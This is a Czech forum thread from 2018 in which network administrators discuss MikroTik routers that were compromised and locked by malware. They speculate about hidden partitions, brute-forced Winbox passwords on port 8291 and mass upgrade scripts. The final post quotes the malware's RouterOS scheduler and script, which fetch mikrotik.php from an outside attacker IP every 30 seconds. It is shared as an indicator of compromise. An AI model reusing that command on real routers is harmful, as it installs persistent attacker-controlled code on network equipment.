MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[Dalibor Toman]

co je to za typ RB? Alespon architektura. MIPSBE?

[Sidi]

co je to za typ RB? Alespon architektura. MIPSBE?

912, routovaná síť, tohle konkrétně je bridge (horn sektor). Zatím jedinej napadenej.

[kodlkal]

Jestli máš v ruce nějaké ty loginy a hesla z toho minulého ''zamykače'' tak pošli zkusím.

Tak jednoduché to není. Pokud mi ale pošleš jeden zamklý stroj a nebude to nějaká nová neznámá kompletní mutace, heslo a login ti pošlu. Může v něm být i poslední verze ROS, tzv. bezpečná. Předpokládám, že pokud se to podaří, vše proběhlo dle stejného scénáře, heslo bude fungovat i do toho zbytku zamklých. Být tebou, tak neváhám, útočník má kompletní přístup do tvé sítě, je dokonce schopen odchytávat data z emailů, hesla atd. mpcz, 25.7.2018

Odkud jste vojáku? Kdyby to bylo v mém dostřelu klidně to dovezu osobně pro analýzu

Připojuji se, dovezu taky jeden!

[hapi]

vezete nakažený rbčka někomu kdo nedavno přišel na to že unix má jiný konce řádků v textu? jo to má smysl

[hapi]

Nenapadla už někoho taková kacířská myšlenka, že do ROSu existuje nějaké univerzální heslo, které si tam zadrátovali přímo v Mikrotiku? Nebyli by první, ani poslední. Tím by se dalo vysvětlit to, proč se to šíří i na 'bezpečných' verzích.

žádný tam není, jestli si čet něco s těch odkazů co už tu jsou 2x tak to někdo opravdu hodně pitval a nic tam není.

Nikdo zatím nepotvrdil nákazu na posledních verzí. Jenom něco vyštěk a nepotvrdil.

Minulý týden aktualizovaný RB na 6.42.5, změněno heslo, máme změněné i uživatelské jméno. Tento týden napaden, nemá veřejnou IP.

tak už nejspíš nakažený bylo ne?

[Dalibor Toman]

tak už nejspíš nakažený bylo ne?

myslis jako, ze infekce prezila upgrade ROSu?

[hapi]

jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?

[mpcz]

Možná asi jde o to, co to je infekce, že. Co tu mám různé vzorky, tak virus úmyslně upgraduje ROS na "nenapadnutelnou" verzi za účelem neprozrazení nasazených záškodnických funkcí a komunikačních kanálů. Běžné funkce ROS, které si tam virus nasadí upgrade přežijí v pohodě, proč taky ne. Druhou partition jsem v odemklých strojích neviděl ani jednou, čímž rozhodně nechci říci, že nemůže existovat. mpcz, 27.7.2018

[Dalibor Toman]

jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?

aby prezil a aktivoval se kod v ukryte partition pak by bud
1) mikrotik musel aktivne z takovych partition neco spoustet - tj prolezt vsechny partitions a neco spoustet. Ne ze by me to na zaklade zverejnenych chyb nejak prekvapilo, ale cekal bych ze v novejsich ROSech takove prasarny odstavi
2) z te nove partition by to muselo bootovat. Cili bud by ten virus musel jeste zmenit poradi bootovani nebo zase nejake pekna featura od MT

zatim jsem nikde nevidel, ze by tohle nekdo potvrdil.

[hapi]

to byla řečnická otázka

[mpcz]

vezete nakažený rbčka někomu kdo nedavno přišel na to že unix má jiný konce řádků v textu? jo to má smysl

Pan kolega Hapi má svatou pravdu. Celý problém tajemství útočníka a neproniknutelnosti kódu se totiž skrývá v posledních bajtech každého řádku příkazu/textu Linuxu. Pošli zamklé stroje jemu, ušetříš za poštovné a odemknutí máš aspoň jisté, což u mě rozhodně nehrozí. mpcz, 27.7.2018

[ludvik]

Pokud se to nechová jako bootvirus. Je tedy otázkou, zda i PPC/ARM/MIPS/TILE bootuje stejně jako x86 ... ale pokud, tak MBR asi obyčejný install nepřepisuje.
Ale celá tato konstrukce mi přijde hodně přes čáru.

jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?

aby prezil a aktivoval se kod v ukryte partition pak by bud
1) mikrotik musel aktivne z takovych partition neco spoustet - tj prolezt vsechny partitions a neco spoustet. Ne ze by me to na zaklade zverejnenych chyb nejak prekvapilo, ale cekal bych ze v novejsich ROSech takove prasarny odstavi
2) z te nove partition by to muselo bootovat. Cili bud by ten virus musel jeste zmenit poradi bootovani nebo zase nejake pekna featura od MT

zatim jsem nikde nevidel, ze by tohle nekdo potvrdil.

[3com]

Tak co lajdáci už někdo přišel na to jaký ten virus dal login a heslo? ) U nás po třech dnech nespání a rekonfiguraci/upgrade ROS tisíce jednotek je bez přístupu 88 klientských strojů na veřejných IP co byly přístupné z naší blbosti na portu 8291. Všechny nepřístupné jsou ty co měly jednoduché heslo v anglickém jazyce.... Vysílací antény cca 200ks měly heslo v českém jazyce + číslo a zde infekce neproniknula ani na jeden ikdyž měly stejnou konfiguraci a verzi ROS stejnou 6.31.3. Tudis vidím to na brutalforce uhodnutí hesla... Jako protiakce byl zablokován port 8291 z internetu a od té doby už nikde není žádný pokus o login v logu žádného stroje... Omg školácká chyba....

[mpcz]

Je to jen můj odhad kolemjdoucího, ale nezdá se mi, že by se někdo dneska zdržoval hádáním hesla. Jednak to zbytečně zdržuje a dlouhé procesy jsou dobře zachytitelné. Jinak - zachytil někdo někdy tento hádací proces na svojem stroji? Samozřejmě vylučuji ty jednoduché slovníkové zkoušky na ustálené user/password, které předpokládám správce tak velké sítě nepoužil.
K té otázce - za lajdáka se nemám, ale ano, heslo se dá ze zamklého stroje vylomit a použít na odemknutí ostatních strojů.
Je jasné, že tyto problémy jsou způsobeny především leností/není čas/třeba se nám to vyhne, protože ručně upgradovat tisíce strojů je docela fuška. Zatím co mám rozdělanou betaverzi "aut. upgradátoru", funguje pouze tento stav:
udělá upgrade ROS
udělá upgrade bios
blokne všechny porty kromě winboxu
změní port na určených nebloklých services
změní heslo
zamkne přístup jen z určitých adres
přidá do FW nebo jinam pár řádků
Zatím to funguje dobře, jen je asi potřeba popřemýšlet a promyslet pořadí příkazů, než to oběhá celou síť, chvilku to trvá. Ty upgrade zdržují a vyžadují opatrost v načasování. Pokud by někdo viděl další potřebu, nechť se třeba ozve, je lepší to udělat hned, pozdější rýpání do SW je o dost pracnější.
Je to zatím dost jednoduché, ale pro malinkou síť a skromné potřeby to udělá vše, co je třeba nyní udělat. mpcz, 28.7.2018

[K3NY]

nezaznamenali jste od 30.7 zvyseny pocet odeslanych emailu od zakazniku?
aktualne pozoruji ze vsichni s Mk maji

Kód: Vybrat vše

/system scheduleradd interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup/system scriptadd name=script3_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
a ve files: mikrotik.php


ip adresa pouzivaji 95.154.216.164-165-166
bezi to i na MK s 6.40.6, problemy jsem zatim nezaznamenal na MK s 6.40.8, ale je to zatim prvni dojem